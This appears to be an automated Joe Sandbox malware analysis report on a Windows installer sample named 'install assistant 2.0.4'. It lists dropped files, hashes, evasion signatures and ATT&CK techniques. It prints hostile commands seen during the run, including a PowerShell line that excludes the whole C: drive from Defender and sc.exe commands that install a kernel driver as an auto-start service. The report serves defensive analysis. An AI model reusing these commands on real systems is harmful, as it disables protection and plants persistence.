Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe	File created: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe	File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\update.vac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3345
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Window / User API: threadDelayed 614
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Window / User API: threadDelayed 589
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Window / User API: threadDelayed 563
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-9PU3N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe	API coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Code function: 5_2_6C7AAEC0 FindFirstFileA,FindClose,	5_2_6C7AAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 9_2_00C76868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,	9_2_00C76868
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 9_2_00C77496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,	9_2_00C77496
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 9_2_00C79C60 GetSystemInfo,	9_2_00C79C60
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000002.1710277164.000000000137C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Code function: 5_2_6C633886 NtSetInformationThread 00000000,00000011,00000000,00000000	5_2_6C633886
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Code function: 5_2_6C7C0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6C7C0181
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 9_2_00CF57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,	9_2_00CF57D0
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Code function: 5_2_6C7C9D66 mov eax, dword ptr fs:[00000030h]	5_2_6C7C9D66
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Code function: 5_2_6C7C9D35 mov eax, dword ptr fs:[00000030h]	5_2_6C7C9D35
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Code function: 5_2_6C7BF17D mov eax, dword ptr fs:[00000030h]	5_2_6C7BF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Code function: 5_2_6C7B8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6C7B8CBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.11.dr	Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	Code function: 5_2_6C887700 cpuid	5_2_6C887700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C7AB2A GetSystemTimeAsFileTime,9_2_00C7AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D10090 GetVersion,9_2_00D10090
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
MITRE ATT&CK matrix (techniques grouped by tactic; the digits in parentheses are the count badges the report shows beside that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); Service Execution (1); Native API (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Windows Service (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Access Token Manipulation (1); Windows Service (1); Process Injection (111); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (231); Access Token Manipulation (1); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Security Software Discovery (431); Virtualization/Sandbox Evasion (231); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (2); File and Directory Discovery (3); System Information Discovery (25); Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1579693; Sample: #U5b89#U88c5#U52a9#U624b_2.0.4.exe; Start date: 23/12/2024; Architecture: WINDOWS; Score: 96). Top-level signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; 3 other signatures. Process chain recovered from the graph text: #U5b89#U88c5#U52a9#U624b_2.0.4.exe drops and starts #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PE32), which drops update.vac (PE32) and _setup64.tmp (PE32+), adds a directory exclusion to Windows Defender, starts powershell.exe (Loading BitLocker PowerShell Module; children conhost.exe and WmiPrvSE.exe) and re-launches #U5b89#U88c5#U52a9#U624b_2.0.4.exe, which drops a second #U5b89#U88c5#U52a9#U624b_2.0.4.tmp. That second .tmp drops update.vac (PE32), trash (copy) (PE32+), is-9PU3N.tmp (PE32+) and 3 other files (1 malicious); it triggers Query firmware table information (likely to detect VMs), Protects its processes via BreakOnTermination flag, Hides threads from debuggers and Contains functionality to hide a thread from the debugger; and it starts 7zr.exe twice (each with a conhost.exe child), one instance dropping tProtect.dll (PE32+). Separately, cmd.exe instances and 32 other processes start sc.exe (each with a conhost.exe child).

Submitted file:
Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b_2.0.4.exe | 10% | Virustotal
#U5b89#U88c5#U52a9#U624b_2.0.4.exe | 0% | ReversingLabs

Dropped files:
Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal
C:\Program Files (x86)\Windows NT\hrsw.vbc | 11% | ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc | 10% | Virustotal
C:\Program Files (x86)\Windows NT\is-9PU3N.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\is-9PU3N.tmp | 0% | Virustotal
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 4% | Virustotal
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\update.vac | 11% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-361I0.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-361I0.tmp\update.vac | 11% | ReversingLabs
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | false | | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | false | | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | false | | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | false | | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F4AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002980000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1677364257.0000000000A51000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000000.1700682526.000000000028D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.dr | false | | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | false | | high
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675967840.000000007F4AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1675593698.0000000002980000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1677364257.0000000000A51000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000000.1700682526.000000000028D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.dr | false | | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004539000.00000004.00001000.00020000.00000000.sdmp, is-9PU3N.tmp.5.dr | false | | high
                    No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579693
Start date and time: 2024-12-23 07:39:38 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 112
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b_2.0.4.exe (renamed because the original name is a hash value)
Original Sample Name: _2.0.4.exe
Detection: MAL
Classification: mal96.evad.winEXE@147/32@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 66
• Number of non-executed functions: 75
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:40:30 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp modified
01:40:33 | API Interceptor | 26x Sleep call for process: powershell.exe modified
                    No context
Match: C:\Program Files (x86)\Windows NT\7zr.exe
Associated Sample Name / URL | Detection | Threat Name
Zt43pLXYiu.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_1.0.9.exe | malicious | Unknown
Zt43pLXYiu.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_1.0.1.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_1.0.8.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_1.0.9.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_1.0.1.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_1.0.8.exe | malicious | Unknown
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | malicious | Unknown
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | malicious | Unknown
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):831200
                                        Entropy (8bit):6.671005303304742
                                        Encrypted:false
                                        SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                        MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                        SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                        SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                        SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Zt43pLXYiu.exe, Detection: malicious
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
                                        • Filename: Zt43pLXYiu.exe, Detection: malicious
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
                                        • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
                                        • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):250000
                                        Entropy (8bit):7.999233217470119
                                        Encrypted:true
                                        SSDEEP:6144:PXyeefmG6AmpTDIX5m4kwCHIgLCSQ+pukav5Ew0rCFBp:PTYNmpn2o4kxO1tR9Fv
                                        MD5:F3E50B3F3BA2DAECD6DFD250FC1FBF59
                                        SHA1:9D9140B5C80B29527B4D80A57EA7EB2977756F56
                                        SHA-256:E02FF764DC2A42E59039C9E73BD6F6D337CB8C7646FC13ABFAA5A0799C3BA20E
                                        SHA-512:F61BE85D5E6AD21B2E1D74B4495F491D1953432E43A4D025C830F8CE6BB49B94CF1355974513FF2979261EFD1FB15DE563ABD2AB32DBAAB88C0721B975634C60
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        • Antivirus: Virustotal, Detection: 10%
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):250000
                                        Entropy (8bit):7.999233217470119
